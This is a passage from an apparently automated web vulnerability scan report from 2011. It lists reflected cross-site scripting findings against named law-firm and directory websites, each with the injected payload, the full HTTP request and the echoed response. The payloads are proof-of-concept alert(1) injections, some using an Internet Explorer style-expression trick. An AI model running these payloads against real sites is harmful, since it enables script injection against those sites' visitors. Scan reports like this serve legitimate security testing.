Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=kqd4kregj1lis3uz4nrgoa55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]>
...[SNIP]...

4.118. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learnestateplanning.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa91"><script>alert(1)</script>3a8a42ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?faa91"><script>alert(1)</script>3a8a42ea6f9=1 HTTP/1.1
Host: www.learnestateplanning.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 19 Jan 2011 16:52:08 GMT
Content-type: text/html
Connection: close

<html><head><title>LEARNESTATEPLANNING.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://sites.google.com/a/mayberrylawfirm.com/learnestateplanning/?faa91"><script>alert(1)</script>3a8a42ea6f9=1" name="LEARNESTATEPLANNING.COM">
...[SNIP]...

4.119. http://www.local.com/results.aspx [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7005"style%3d"x%3aexpression(alert(1))"e433a090613 was submitted in the CID parameter. This input was echoed as b7005"style="x:expression(alert(1))"e433a090613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22b7005"style%3d"x%3aexpression(alert(1))"e433a090613 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 140321
Date: Wed, 19 Jan 2011 16:55:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=2kp5nz3tik1sq1fna4qmow45; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22b7005"style="x:expression(alert(1))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=dc362bce-4849-438a-bd9e-20b0269c8fd9&expdate=634336161100159854&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(1))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:55:10 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22b7005"style="x:expression(alert(1))"e433a090613&exp=634310259100159854; domain=local.com; expires=Wed, 19-Jan-2011 17:25:10 GMT; path=/
Content-Length: 140321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22b7005"style="x:expression(alert(1))"e433a090613&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.120. http://www.local.com/results.aspx [CID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the CID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc1a"%3bbdb542a73ab was submitted in the CID parameter. This input was echoed as abc1a";bdb542a73ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22abc1a"%3bbdb542a73ab HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138997
Date: Wed, 19 Jan 2011 16:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=j2ua4c45yad2fi450tpoco55; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22abc1a";bdb542a73ab&loc=Dallas%2c+TX&kw=law+offices&uid=ee28739b-dce3-4ad1-af39-ce25887ac7db&expdate=634336161121623015&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22abc1a%22%253bbdb542a73ab&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:55:12 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22abc1a";bdb542a73ab&exp=634310259121623015; domain=local.com; expires=Wed, 19-Jan-2011 17:25:12 GMT; path=/
Content-Length: 138997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
offices";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "2531/x22abc1a";bdb542a73ab";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Attorneys & Lawyers: General Practice";
s.eVa
...[SNIP]...

4.121. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb72"style="x:expression(alert(1))"4ccefb20720 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22&dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138662
Date: Wed, 19 Jan 2011 16:56:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=blu1lc45gh00cti30geojtrb; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=b78384a3-ca52-4529-b52d-d9bd5fffc842&expdate=634336161669772654&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22%26dbb72%22style%253d%22x%253aexpression(alert(1))%224ccefb20720%3d1&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:56:06 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310259669772654; domain=local.com; expires=Wed, 19-Jan-2011 17:26:06 GMT; path=/
Content-Length: 138662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22&dbb72"style="x:expression(alert(1))"4ccefb20720=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.122. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mckennacuneo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1
Host: www.mckennacuneo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:52:37 GMT
Server: Apache/2.2.15 (FreeBSD)
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15847

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html;
...[SNIP]...
<a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'>
...[SNIP]...

4.123. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
<script type="text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

4.124. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
"text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

4.125. http://www.usdirectory.com/gypr.aspx [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The value of the cc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ab29'%3balert(1)//2894fafc0c6 was submitted in the cc parameter. This input was echoed as 4ab29';alert(1)//2894fafc0c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gypr.aspx?afid=1993&cc=54111051004ab29'%3balert(1)//2894fafc0c6&cr=3209505169&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:08 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:08 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
var switch_open_once_only=1;
       function open_once_only(){
           if(switch_open_once_only){
document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=3209505169&oid=&cc=54111051004ab29';alert(1)//2894fafc0c6';    
switch_open_once_only=0;
           }
       }
       function quicksearchform_onsubmit() {
           var form = document.forms.quicksearchform;
           var str = form.qhqn.value;
           
           /*if( document.getElementB
...[SNIP]...

4.126. http://www.usdirectory.com/gypr.aspx [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The value of the cr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5878e'%3balert(1)//136c0518b8b was submitted in the cr parameter. This input was echoed as 5878e';alert(1)//136c0518b8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gypr.aspx?afid=1993&cc=5411105100&cr=32095051695878e'%3balert(1)//136c0518b8b&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:19 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:18 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <m
...[SNIP]...
xt/javascript">
       var switch_open_once_only=1;
       function open_once_only(){
           if(switch_open_once_only){
document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=32095051695878e';alert(1)//136c0518b8b&oid=&cc=5411105100';    
switch_open_once_only=0;
           }
       }
       function quicksearchform_onsubmit() {
           var form = document.forms.quicksearchform;
           var str = form.qhqn.value;
           
           /*if( d
...[SNIP]...

4.127. http://www.vault.com/wps/portal/usa/rankings/individual [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c40'%3balert(1)//dba4d06d54c was submitted in the REST URL parameter 4. This input was echoed as f6c40';alert(1)//dba4d06d54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankingsf6c40'%3balert(1)//dba4d06d54c/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:10:14 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000DmxfkY9YKAx1Q4mLBLNSFjN:140i3s34m; Path=/
Keep-Alive: timeout=10, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:18 GMT;path=/
Content-Length: 68250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
ideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankingsf6c40';alert(1)//dba4d06d54c/individual'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google
...[SNIP]...

4.128. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8325'-alert(1)-'adbf0a50b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000YsvtmY0WeGqmBw8q3S7jS3Y:140i3s34m; Path=/
Keep-Alive: timeout=10, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:57 GMT;path=/
Content-Length: 104769


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenge
...[SNIP]...

4.129. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1411"><script>alert(1)</script>54ec8343c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:49 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000qF5wpbf0wl-7odhNiMXKAn9:140i3s34m; Path=/
Keep-Alive: timeout=10, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:53 GMT;path=/
Content-Length: 104190


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/
...[SNIP]...

4.130. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72071"><script>alert(1)</script>cbaa09597bd was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:58 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000PjHkXd4fWrCD7JGVNx5m439:140i3s34m; Path=/
Keep-Alive: timeout=10, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:03 GMT;path=/
Content-Length: 67444


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Ema
...[SNIP]...

4.131. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
